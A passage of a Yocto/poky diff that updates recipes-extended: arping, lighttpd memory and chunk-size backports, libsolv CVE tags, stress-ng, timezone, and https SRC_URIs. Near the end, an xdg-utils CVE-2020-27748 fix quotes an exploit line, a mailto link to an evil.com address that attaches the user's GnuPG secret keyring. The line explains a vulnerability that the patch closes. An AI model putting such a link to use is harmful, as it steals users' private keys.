00:00:00:00:00:01 + +Create interface eth0:0 on machine 1, and use the arping command to send arp +packets. Expected outcome on machine 3: + + 10.20.30.3 machine 1 eth0:0 00:00:00:00:00:01 + 10.20.30.2 machine 2 eth0 00:00:00:00:00:02 + 10.20.30.1 machine 1 eth0 00:00:00:00:00:01 + +Actual results on machine 3: + + 10.20.30.3 machine 2 eth0:0 00:00:00:00:00:02 + 10.20.30.2 machine 2 eth0 00:00:00:00:00:02 + 10.20.30.1 machine 1 eth0 00:00:00:00:00:01 + +Fixes: https://github.com/iputils/iputils/issues/298 +Fixes: 68f12fc4a0dbef4ae4c404da24040d22c5a14339 +Signed-off-by: Aichun Li <liaichun@huawei.com> +Upstream-Status: Backport [https://github.com/iputils/iputils/commit/86ed08936d49e2c81ef49dfbd02aca1c74d0c098] +Signed-off-by: Visa Hankala <visa@hankala.org> +--- + arping.c | 16 +++++++++------- + 1 file changed, 9 insertions(+), 7 deletions(-) + +diff --git a/arping.c b/arping.c +index a002786..53fdbb4 100644 +--- a/arping.c ++++ b/arping.c +@@ -968,7 +968,7 @@ int main(int argc, char **argv) + } + memset(&saddr, 0, sizeof(saddr)); + saddr.sin_family = AF_INET; +- if (!ctl.unsolicited && (ctl.source || ctl.gsrc.s_addr)) { ++ if (ctl.source || ctl.gsrc.s_addr) { + saddr.sin_addr = ctl.gsrc; + if (bind(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1) + error(2, errno, "bind"); +@@ -979,12 +979,14 @@ int main(int argc, char **argv) + saddr.sin_port = htons(1025); + saddr.sin_addr = ctl.gdst; + +- if (setsockopt(probe_fd, SOL_SOCKET, SO_DONTROUTE, (char *)&on, sizeof(on)) == -1) +- error(0, errno, _("WARNING: setsockopt(SO_DONTROUTE)")); +- if (connect(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1) +- error(2, errno, "connect"); +- if (getsockname(probe_fd, (struct sockaddr *)&saddr, &alen) == -1) +- error(2, errno, "getsockname"); ++ if (!ctl.unsolicited) { ++ if (setsockopt(probe_fd, SOL_SOCKET, SO_DONTROUTE, (char *)&on, sizeof(on)) == -1) ++ error(0, errno, _("WARNING: setsockopt(SO_DONTROUTE)")); ++ if (connect(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1) ++ error(2, errno, "connect"); ++ if (getsockname(probe_fd, (struct sockaddr *)&saddr, &alen) == -1) ++ error(2, errno, "getsockname"); ++ } + ctl.gsrc = saddr.sin_addr; + } + close(probe_fd); diff --git a/poky/meta/recipes-extended/iputils/iputils_s20190709.bb b/poky/meta/recipes-extended/iputils/iputils_s20190709.bb index d652bfcaad..a715d0a37b 100644 --- a/poky/meta/recipes-extended/iputils/iputils_s20190709.bb +++ b/poky/meta/recipes-extended/iputils/iputils_s20190709.bb @@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=55aa8c9fcad0691cef0ecd420361e390" DEPENDS = "gnutls" -SRC_URI = "git://github.com/iputils/iputils \ +SRC_URI = "git://github.com/iputils/iputils;branch=master;protocol=https \ file://0001-ninfod-change-variable-name-to-avoid-colliding-with-.patch \ file://0001-ninfod-fix-systemd-Documentation-url-error.patch \ file://0001-rarpd-rdisc-Drop-PrivateUsers.patch \ @@ -20,6 +20,7 @@ SRC_URI = "git://github.com/iputils/iputils \ file://0003-arping-Fix-comparison-of-different-signedness-warnin.patch \ file://0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch \ file://0005-arping-use-additional-timerfd-to-control-when-timeou.patch \ + file://0001-arping-make-update-neighbours-work-again.patch \ " SRCREV = "13e00847176aa23683d68fce1d17ffb523510946" diff --git a/poky/meta/recipes-extended/libaio/libaio_0.3.111.bb b/poky/meta/recipes-extended/libaio/libaio_0.3.111.bb index 8e1cd349a0..309ae53bfb 100644 --- a/poky/meta/recipes-extended/libaio/libaio_0.3.111.bb +++ b/poky/meta/recipes-extended/libaio/libaio_0.3.111.bb @@ -5,7 +5,7 @@ HOMEPAGE = "http://lse.sourceforge.net/io/aio.html" LICENSE = "LGPLv2.1+" LIC_FILES_CHKSUM = "file://COPYING;md5=d8045f3b8f929c1cb29a1e3fd737b499" -SRC_URI = "git://pagure.io/libaio.git;protocol=https \ +SRC_URI = "git://pagure.io/libaio.git;protocol=https;branch=master \ file://00_arches.patch \ file://destdir.patch \ file://libaio_fix_for_mips_syscalls.patch \ diff --git a/poky/meta/recipes-extended/libnsl/libnsl2_git.bb b/poky/meta/recipes-extended/libnsl/libnsl2_git.bb index 28c84af7ad..cbb38674b9 100644 --- a/poky/meta/recipes-extended/libnsl/libnsl2_git.bb +++ b/poky/meta/recipes-extended/libnsl/libnsl2_git.bb @@ -14,7 +14,7 @@ PV = "1.2.0+git${SRCPV}" SRCREV = "4a062cf4180d99371198951e4ea5b4550efd58a3" -SRC_URI = "git://github.com/thkukuk/libnsl \ +SRC_URI = "git://github.com/thkukuk/libnsl;branch=master;protocol=https \ " S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-extended/libnss-nis/libnss-nis.bb b/poky/meta/recipes-extended/libnss-nis/libnss-nis.bb index a1d914e871..984cc98fc2 100644 --- a/poky/meta/recipes-extended/libnss-nis/libnss-nis.bb +++ b/poky/meta/recipes-extended/libnss-nis/libnss-nis.bb @@ -17,7 +17,7 @@ PV = "3.1+git${SRCPV}" SRCREV = "062f31999b35393abf7595cb89dfc9590d5a42ad" -SRC_URI = "git://github.com/thkukuk/libnss_nis \ +SRC_URI = "git://github.com/thkukuk/libnss_nis;branch=master;protocol=https \ " S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-extended/libsolv/files/CVE-2021-3200.patch b/poky/meta/recipes-extended/libsolv/files/CVE-2021-3200.patch index 74164ab495..cc8f53cefd 100644 --- a/poky/meta/recipes-extended/libsolv/files/CVE-2021-3200.patch +++ b/poky/meta/recipes-extended/libsolv/files/CVE-2021-3200.patch @@ -11,9 +11,14 @@ been added. (Jobs may point inside the whatproviedes array, so we must not invalidate this area.) -Upstream-Status: Backport -https://github.com/openSUSE/libsolv/commit/0077ef29eb46d2e1df2f230fc95a1d9748d49dec +Upstream-Status: Backport [https://github.com/openSUSE/libsolv/commit/0077ef29eb46d2e1df2f230fc95a1d9748d49dec] CVE: CVE-2021-3200 +CVE: CVE-2021-33928 +CVE: CVE-2021-33929 +CVE: CVE-2021-33930 +CVE: CVE-2021-33938 +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com> --- ext/testcase.c | 21 +++++++++++++++++++++ diff --git a/poky/meta/recipes-extended/libsolv/libsolv_0.7.10.bb b/poky/meta/recipes-extended/libsolv/libsolv_0.7.10.bb index eadf04aa5a..2c2aedc32c 100644 --- a/poky/meta/recipes-extended/libsolv/libsolv_0.7.10.bb +++ b/poky/meta/recipes-extended/libsolv/libsolv_0.7.10.bb @@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://LICENSE.BSD;md5=62272bd11c97396d4aaf1c41bc11f7d8" DEPENDS = "expat zlib" -SRC_URI = "git://github.com/openSUSE/libsolv.git \ +SRC_URI = "git://github.com/openSUSE/libsolv.git;branch=master;protocol=https \ file://CVE-2021-3200.patch \ " diff --git a/poky/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch b/poky/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch index f17bdce2c0..44b9136b05 100644 --- a/poky/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch +++ b/poky/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch @@ -1,4 +1,4 @@ -From 22afc5d9aaa215c3c87ba21c77d47da44ab3b113 Mon Sep 17 00:00:00 2001 +From f918d5ba6ff1d439822be063237aea2705ea27b8 Mon Sep 17 00:00:00 2001 From: Alexander Kanavin <alex.kanavin@gmail.com> Date: Fri, 26 Aug 2016 18:20:32 +0300 Subject: [PATCH] Use pkg-config for pcre dependency instead of -config script. @@ -6,15 +6,16 @@ Subject: [PATCH] Use pkg-config for pcre dependency instead of -config script. RP 2014/5/22 Upstream-Status: Pending Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com> + --- configure.ac | 16 ++++++++++++---- 1 file changed, 12 insertions(+), 4 deletions(-) diff --git a/configure.ac b/configure.ac -index 5383cec..c29a902 100644 +index dbddfb9..62cf17f 100644 --- a/configure.ac +++ b/configure.ac -@@ -651,10 +651,18 @@ AC_ARG_WITH([pcre], +@@ -748,10 +748,18 @@ AC_ARG_WITH([pcre], ) AC_MSG_RESULT([$WITH_PCRE]) @@ -37,6 +38,3 @@ index 5383cec..c29a902 100644 else AC_PATH_PROG([PCRECONFIG], [pcre-config]) if test -n "$PCRECONFIG"; then --- -2.15.0 - diff --git a/poky/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch b/poky/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch new file mode 100644 index 0000000000..e226366112 --- /dev/null +++ b/poky/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch @@ -0,0 +1,224 @@ +From a566fe4cc9f9d0ef9cfdcbc13159ef0644e91c9c Mon Sep 17 00:00:00 2001 +From: Glenn Strauss <gstrauss@gluelogic.com> +Date: Wed, 23 Dec 2020 23:14:47 -0500 +Subject: [PATCH] reuse large mem chunks (fix mem usage) (fixes #3033) + +(cherry picked from commit 7ba521ffb4959f6f74a609d5d4acafc29a038337) + +(thx flynn) + +fix large memory usage for large file downloads from dynamic backends + +reuse or release large memory chunks + +x-ref: + "Memory Growth with PUT and full buffered streams" + https://redmine.lighttpd.net/issues/3033 + +Upstream-Status: Backport +Comment: Hunk refreshed to make it backword compatible. +https://redmine.lighttpd.net/projects/lighttpd/repository/14/revisions/7ba521ffb4959f6f74a609d5d4acafc29a038337 +Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com> + +--- + src/chunk.c | 99 +++++++++++++++++++++++++++++++++--------- + src/chunk.h | 2 + + src/http-header-glue.c | 2 +- + 3 files changed, 82 insertions(+), 21 deletions(-) + +diff --git a/src/chunk.c b/src/chunk.c +index 133308f..d7259b9 100644 +--- a/src/chunk.c ++++ b/src/chunk.c +@@ -28,16 +28,20 @@ + static size_t chunk_buf_sz = 8192; + static chunk *chunks, *chunks_oversized; + static chunk *chunk_buffers; ++static int chunks_oversized_n; + static array *chunkqueue_default_tempdirs = NULL; + static off_t chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE; + + void chunkqueue_set_chunk_size (size_t sz) + { +- chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 8192; ++ size_t x = 1024; ++ while (x < sz && x < (1u << 30)) x <<= 1; ++ chunk_buf_sz = sz > 0 ? x : 8192; + } + + void chunkqueue_set_tempdirs_default_reset (void) + { ++ chunk_buf_sz = 8192; + chunkqueue_default_tempdirs = NULL; + chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE; + } +@@ -120,15 +124,49 @@ static void chunk_free(chunk *c) { + free(c); + } + +-buffer * chunk_buffer_acquire(void) { ++static chunk * chunk_pop_oversized(size_t sz) { ++ /* future: might have buckets of certain sizes, up to socket buf sizes */ ++ if (chunks_oversized && chunks_oversized->mem->size >= sz) { ++ --chunks_oversized_n; ++ chunk *c = chunks_oversized; ++ chunks_oversized = c->next; ++ return c; ++ } ++ return NULL; ++} ++ ++static void chunk_push_oversized(chunk * const c, const size_t sz) { ++ if (chunks_oversized_n < 64 && chunk_buf_sz >= 4096) { ++ ++chunks_oversized_n; ++ chunk **co = &chunks_oversized; ++ while (*co && sz < (*co)->mem->size) co = &(*co)->next; ++ c->next = *co; ++ *co = c; ++ } ++ else ++ chunk_free(c); ++} ++ ++static buffer * chunk_buffer_acquire_sz(size_t sz) { + chunk *c; + buffer *b; +- if (chunks) { +- c = chunks; +- chunks = c->next; ++ if (sz <= chunk_buf_sz) { ++ if (chunks) { ++ c = chunks; ++ chunks = c->next; ++ } ++ else ++ c = chunk_init(chunk_buf_sz); ++ /* future: might choose to pop from chunks_oversized, if available ++ * (even if larger than sz) rather than allocating new chunk ++ * (and if doing so, might replace chunks_oversized_n) */ + } + else { +- c = chunk_init(chunk_buf_sz); ++ /*(round up to nearest chunk_buf_sz)*/ ++ sz = (sz + (chunk_buf_sz-1)) & ~(chunk_buf_sz-1); ++ c = chunk_pop_oversized(sz); ++ if (NULL == c) ++ c = chunk_init(sz); + } + c->next = chunk_buffers; + chunk_buffers = c; +@@ -137,21 +175,47 @@ buffer * chunk_buffer_acquire(void) { + return b; + } + ++buffer * chunk_buffer_acquire(void) { ++ return chunk_buffer_acquire_sz(chunk_buf_sz); ++} ++ + void chunk_buffer_release(buffer *b) { + if (NULL == b) return; +- if (b->size >= chunk_buf_sz && chunk_buffers) { ++ if (chunk_buffers) { + chunk *c = chunk_buffers; + chunk_buffers = c->next; + c->mem = b; +- c->next = chunks; +- chunks = c; + buffer_clear(b); ++ if (b->size == chunk_buf_sz) { ++ c->next = chunks; ++ chunks = c; ++ } ++ else if (b->size > chunk_buf_sz) ++ chunk_push_oversized(c, b->size); ++ else ++ chunk_free(c); + } + else { + buffer_free(b); + } + } + ++size_t chunk_buffer_prepare_append(buffer * const b, size_t sz) { ++ if (sz > chunk_buffer_string_space(b)) { ++ sz += b->used ? b->used : 1; ++ buffer * const cb = chunk_buffer_acquire_sz(sz); ++ /* swap buffer contents and copy original b->ptr into larger b->ptr */ ++ /*(this does more than buffer_move())*/ ++ buffer tb = *b; ++ *b = *cb; ++ *cb = tb; ++ if ((b->used = tb.used)) ++ memcpy(b->ptr, tb.ptr, tb.used); ++ chunk_buffer_release(cb); ++ } ++ return chunk_buffer_string_space(b); ++} ++ + static chunk * chunk_acquire(size_t sz) { + if (sz <= chunk_buf_sz) { + if (chunks) { +@@ -162,13 +226,10 @@ static chunk * chunk_acquire(size_t sz) { + sz = chunk_buf_sz; + } + else { +- sz = (sz + 8191) & ~8191uL; +- /* future: might have buckets of certain sizes, up to socket buf sizes*/ +- if (chunks_oversized && chunks_oversized->mem->size >= sz) { +- chunk *c = chunks_oversized; +- chunks_oversized = c->next; +- return c; +- } ++ /*(round up to nearest chunk_buf_sz)*/ ++ sz = (sz + (chunk_buf_sz-1)) & ~(chunk_buf_sz-1); ++ chunk *c = chunk_pop_oversized(sz); ++ if (c) return c; + } + + return chunk_init(sz); +@@ -183,10 +244,7 @@ static void chunk_release(chunk *c) { + } + else if (sz > chunk_buf_sz) { + chunk_reset(c); +- chunk **co = &chunks_oversized; +- while (*co && sz < (*co)->mem->size) co = &(*co)->next; +- c->next = *co; +- *co = c; ++ chunk_push_oversized(c, sz); + } + else { + chunk_free(c); +@@ -205,6 +263,7 @@ void chunkqueue_chunk_pool_clear(void) + chunk_free(c); + } + chunks_oversized = NULL; ++ chunks_oversized_n = 0; + } + + void chunkqueue_chunk_pool_free(void) +diff --git a/src/chunk.h b/src/chunk.h +index 4c6b7e4..93f343c 100644 +--- a/src/chunk.h ++++ b/src/chunk.h +@@ -50,6 +50,8 @@ typedef struct { + buffer * chunk_buffer_acquire(void); + void chunk_buffer_release(buffer *b); + ++size_t chunk_buffer_prepare_append (buffer *b, size_t sz); ++ + void chunkqueue_chunk_pool_clear(void); + void chunkqueue_chunk_pool_free(void); + +diff --git a/src/http-header-glue.c b/src/http-header-glue.c +index d54f00c..2231fba 100644 +--- a/src/http-header-glue.c ++++ b/src/http-header-glue.c +@@ -1267,7 +1267,7 @@ handler_t http_response_read(server *srv, connection *con, http_response_opts *o + if (avail < toread) { + /*(add avail+toread to reduce allocations when ioctl EOPNOTSUPP)*/ + avail = avail ? avail - 1 + toread : toread; +- buffer_string_prepare_append(b, avail); ++ avail = chunk_buffer_prepare_append(b, avail); + } + + n = read(fd, b->ptr+buffer_string_length(b), avail); diff --git a/poky/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch b/poky/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch new file mode 100644 index 0000000000..fd75ca6e26 --- /dev/null +++ b/poky/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch @@ -0,0 +1,35 @@ +From 2e08ee1d404e308f15551277e92b7605ddfa96a8 Mon Sep 17 00:00:00 2001 +From: Glenn Strauss <gstrauss@gluelogic.com> +Date: Fri, 29 Nov 2019 18:18:52 -0500 +Subject: [PATCH] default chunk size 8k (was 4k) + +Upstream-Status: Backport +Comment: No hunk refreshed +https://git.lighttpd.net/lighttpd/lighttpd1.4/commit/304e46d4f808c46cbb025edfacf2913a30ce8855 +Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com> +--- + src/chunk.c | 4 ++-- + 1 file changed, 2 insertions(+), 2 deletions(-) + +diff --git a/src/chunk.c b/src/chunk.c +index 09dd3f1..133308f 100644 +--- a/src/chunk.c ++++ b/src/chunk.c +@@ -25,7 +25,7 @@ + #define DEFAULT_TEMPFILE_SIZE (1 * 1024 * 1024) + #define MAX_TEMPFILE_SIZE (128 * 1024 * 1024) + +-static size_t chunk_buf_sz = 4096; ++static size_t chunk_buf_sz = 8192; + static chunk *chunks, *chunks_oversized; + static chunk *chunk_buffers; + static array *chunkqueue_default_tempdirs = NULL; +@@ -33,7 +33,7 @@ static off_t chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE; + + void chunkqueue_set_chunk_size (size_t sz) + { +- chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 4096; ++ chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 8192; + } + + void chunkqueue_set_tempdirs_default_reset (void) diff --git a/poky/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb b/poky/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb index 35a268a03f..737d6ebf7c 100644 --- a/poky/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb +++ b/poky/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb @@ -18,6 +18,8 @@ SRC_URI = "http://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-${PV}.t file://lighttpd.conf \ file://lighttpd \ file://0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch \ + file://default-chunk-size-8k.patch \ + file://0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch \ " SRC_URI[md5sum] = "be4bda2c28bcbdac6eb941528f6edf03" diff --git a/poky/meta/recipes-extended/ltp/ltp_20200120.bb b/poky/meta/recipes-extended/ltp/ltp_20200120.bb index 6633755a20..505b7b14fc 100644 --- a/poky/meta/recipes-extended/ltp/ltp_20200120.bb +++ b/poky/meta/recipes-extended/ltp/ltp_20200120.bb @@ -29,7 +29,7 @@ CFLAGS_append_powerpc64 = " -D__SANE_USERSPACE_TYPES__" CFLAGS_append_mipsarchn64 = " -D__SANE_USERSPACE_TYPES__" SRCREV = "4079aaf264d0e9ead042b59d1c5f4e643620d0d5" -SRC_URI = "git://github.com/linux-test-project/ltp.git \ +SRC_URI = "git://github.com/linux-test-project/ltp.git;branch=master;protocol=https \ file://0001-build-Add-option-to-select-libc-implementation.patch \ file://0003-Check-if-__GLIBC_PREREQ-is-defined-before-using-it.patch \ file://0004-guard-mallocopt-with-__GLIBC__.patch \ diff --git a/poky/meta/recipes-extended/newt/libnewt_0.52.21.bb b/poky/meta/recipes-extended/newt/libnewt_0.52.21.bb index 88b4cf4a03..3d35a17c92 100644 --- a/poky/meta/recipes-extended/newt/libnewt_0.52.21.bb +++ b/poky/meta/recipes-extended/newt/libnewt_0.52.21.bb @@ -29,7 +29,7 @@ SRC_URI[sha256sum] = "265eb46b55d7eaeb887fca7a1d51fe115658882dfe148164b6c49fccac S = "${WORKDIR}/newt-${PV}" -inherit autotools-brokensep python3native python3-dir +inherit autotools-brokensep python3native python3-dir python3targetconfig EXTRA_OECONF = "--without-tcl --with-python" diff --git a/poky/meta/recipes-extended/procps/procps_3.3.16.bb b/poky/meta/recipes-extended/procps/procps_3.3.16.bb index 2810ebd285..3a8289b359 100644 --- a/poky/meta/recipes-extended/procps/procps_3.3.16.bb +++ b/poky/meta/recipes-extended/procps/procps_3.3.16.bb @@ -12,7 +12,7 @@ DEPENDS = "ncurses" inherit autotools gettext pkgconfig update-alternatives -SRC_URI = "git://gitlab.com/procps-ng/procps.git;protocol=https \ +SRC_URI = "git://gitlab.com/procps-ng/procps.git;protocol=https;branch=master \ file://sysctl.conf \ " SRCREV = "59c88e18f29000ceaf7e5f98181b07be443cf12f" diff --git a/poky/meta/recipes-extended/psmisc/psmisc_23.3.bb b/poky/meta/recipes-extended/psmisc/psmisc_23.3.bb index e569f1074b..36e6775f9e 100644 --- a/poky/meta/recipes-extended/psmisc/psmisc_23.3.bb +++ b/poky/meta/recipes-extended/psmisc/psmisc_23.3.bb @@ -2,7 +2,7 @@ require psmisc.inc LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3" -SRC_URI = "git://gitlab.com/psmisc/psmisc.git;protocol=https \ +SRC_URI = "git://gitlab.com/psmisc/psmisc.git;protocol=https;branch=master \ file://0001-Use-UINTPTR_MAX-instead-of-__WORDSIZE.patch \ " SRCREV = "78bde849041e6c914a2a517ebe1255b86dc98772" diff --git a/poky/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb b/poky/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb index cb5b288c48..0f8a6f74f8 100644 --- a/poky/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb +++ b/poky/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb @@ -19,7 +19,7 @@ PV = "1.4+git${SRCPV}" SRCREV = "9bc3b5b785723cfff459b0c01b39d87d4bed975c" -SRC_URI = "git://github.com/thkukuk/${BPN} \ +SRC_URI = "git://github.com/thkukuk/${BPN};branch=master;protocol=https \ file://0001-Use-cross-compiled-rpcgen.patch \ " diff --git a/poky/meta/recipes-extended/stress-ng/stress-ng/0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch b/poky/meta/recipes-extended/stress-ng/stress-ng/0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch new file mode 100644 index 0000000000..9dfca0441b --- /dev/null +++ b/poky/meta/recipes-extended/stress-ng/stress-ng/0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch @@ -0,0 +1,26 @@ +From 2386cd8f907b379ae5cc1ce2888abef7d30e709a Mon Sep 17 00:00:00 2001 +From: Alexander Kanavin <alex@linutronix.de> +Date: Sat, 23 Oct 2021 20:20:59 +0200 +Subject: [PATCH] Makefile: do not write the timestamp into compressed manpage. + +This helps reproducibility. + +Upstream-Status: Submitted [https://github.com/ColinIanKing/stress-ng/pull/156] +Signed-off-by: Alexander Kanavin <alex@linutronix.de> +--- + Makefile | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/Makefile b/Makefile +index 886018f9..f4290f9c 100644 +--- a/Makefile ++++ b/Makefile +@@ -412,7 +412,7 @@ git-commit-id.h: + $(OBJS): stress-ng.h Makefile + + stress-ng.1.gz: stress-ng.1 +- gzip -c $< > $@ ++ gzip -n -c $< > $@ + + .PHONY: dist + dist: diff --git a/poky/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb b/poky/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb index 9b987c7bde..cf94e0275b 100644 --- a/poky/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb +++ b/poky/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb @@ -5,11 +5,12 @@ HOMEPAGE = "https://kernel.ubuntu.com/~cking/stress-ng/" LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" -SRC_URI = "https://kernel.ubuntu.com/~cking/tarballs/${BPN}/${BP}.tar.xz \ +SRC_URI = "git://github.com/ColinIanKing/stress-ng.git;protocol=https;branch=master \ file://0001-Do-not-preserve-ownership-when-installing-example-jo.patch \ + file://0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch \ " -SRC_URI[md5sum] = "7b89157c838f2bb4bdeba8f46e3c56ae" -SRC_URI[sha256sum] = "860291dd3a18b985b3483190a627bbede2b5c52113766c1921001b3fb4b83af0" +SRCREV = "e045bcd711178c11b7e797ef6b4c524658468596" +S = "${WORKDIR}/git" DEPENDS = "coreutils-native" diff --git a/poky/meta/recipes-extended/sysklogd/sysklogd.inc b/poky/meta/recipes-extended/sysklogd/sysklogd.inc index 8899daa1b0..e45b256bbe 100644 --- a/poky/meta/recipes-extended/sysklogd/sysklogd.inc +++ b/poky/meta/recipes-extended/sysklogd/sysklogd.inc @@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=5b4be4b2549338526758ef479c040943 \ inherit update-rc.d update-alternatives systemd autotools -SRC_URI = "git://github.com/troglobit/sysklogd.git;nobranch=1 \ +SRC_URI = "git://github.com/troglobit/sysklogd.git;nobranch=1;protocol=https \ file://sysklogd \ file://0001-fix-one-rarely-reproduced-parallel-build-problem.patch \ " diff --git a/poky/meta/recipes-extended/tar/tar_1.32.bb b/poky/meta/recipes-extended/tar/tar_1.32.bb index 0fe0b801c2..db1540dbd6 100644 --- a/poky/meta/recipes-extended/tar/tar_1.32.bb +++ b/poky/meta/recipes-extended/tar/tar_1.32.bb @@ -66,5 +66,6 @@ NATIVE_PACKAGE_PATH_SUFFIX = "/${PN}" BBCLASSEXTEND = "native nativesdk" -# These are both specific to the NPM package node-tar -CVE_CHECK_WHITELIST += "CVE-2021-32803 CVE-2021-32804" +# Avoid false positives from CVEs in node-tar package +# For example CVE-2021-{32803,32804,37701,37712,37713} +CVE_PRODUCT = "gnu:tar" diff --git a/poky/meta/recipes-extended/timezone/timezone.inc b/poky/meta/recipes-extended/timezone/timezone.inc index a89560b424..e9eb249afe 100644 --- a/poky/meta/recipes-extended/timezone/timezone.inc +++ b/poky/meta/recipes-extended/timezone/timezone.inc @@ -6,7 +6,7 @@ SECTION = "base" LICENSE = "PD & BSD & BSD-3-Clause" LIC_FILES_CHKSUM = "file://LICENSE;md5=c679c9d6b02bc2757b3eaf8f53c43fba" -PV = "2021a" +PV = "2021e" SRC_URI =" http://www.iana.org/time-zones/repository/releases/tzcode${PV}.tar.gz;name=tzcode \ http://www.iana.org/time-zones/repository/releases/tzdata${PV}.tar.gz;name=tzdata \ @@ -14,5 +14,6 @@ SRC_URI =" http://www.iana.org/time-zones/repository/releases/tzcode${PV}.tar.gz UPSTREAM_CHECK_URI = "http://www.iana.org/time-zones" -SRC_URI[tzcode.sha256sum] = "eb46bfa124b5b6bd13d61a609bfde8351bd192894708d33aa06e5c1e255802d0" -SRC_URI[tzdata.sha256sum] = "39e7d2ba08c68cbaefc8de3227aab0dec2521be8042cf56855f7dc3a9fb14e08" +SRC_URI[tzcode.sha256sum] = "584666393a5424d13d27ec01183da17703273664742e049d4f62f62dab631775" +SRC_URI[tzdata.sha256sum] = "07ec42b737d0d3c6be9c337f8abb5f00554a0f9cc4fcf01a703d69403b6bb2b1" + diff --git a/poky/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch b/poky/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch new file mode 100644 index 0000000000..948b9e22e9 --- /dev/null +++ b/poky/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch @@ -0,0 +1,58 @@ +From 1f199813e0eb0246f63b54e9e154970e609575af Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= <joerg@thalheim.io> +Date: Tue, 18 Aug 2020 16:52:24 +0100 +Subject: [PATCH] xdg-email: remove attachment handling from mailto +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This allows attacker to extract secrets from users: + +mailto:sid@evil.com?attach=/.gnupg/secring.gpg + +See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425 +and https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177 + +Signed-off-by: Jörg Thalheim <joerg@thalheim.io> +--- + scripts/xdg-email.in | 7 +------ + 1 file changed, 1 insertion(+), 6 deletions(-) + +Upstream-Status: Backport +CVE: CVE-2020-27748 + +diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in +index 6db58ad..5d2f4f3 100644 +--- a/scripts/xdg-email.in ++++ b/scripts/xdg-email.in +@@ -32,7 +32,7 @@ _USAGE + + run_thunderbird() + { +- local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY ATTACH ++ local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY + THUNDERBIRD="$1" + MAILTO=$(echo "$2" | sed 's/^mailto://') + echo "$MAILTO" | grep -qs "^?" +@@ -48,7 +48,6 @@ run_thunderbird() + BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }')) + SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1) + BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1) +- ATTACH=$(/bin/echo -e $(echo "$MAILTO" | grep '^attach=' | sed 's/^attach=//;s/%\(..\)/\\x\1/g' | awk '{ printf 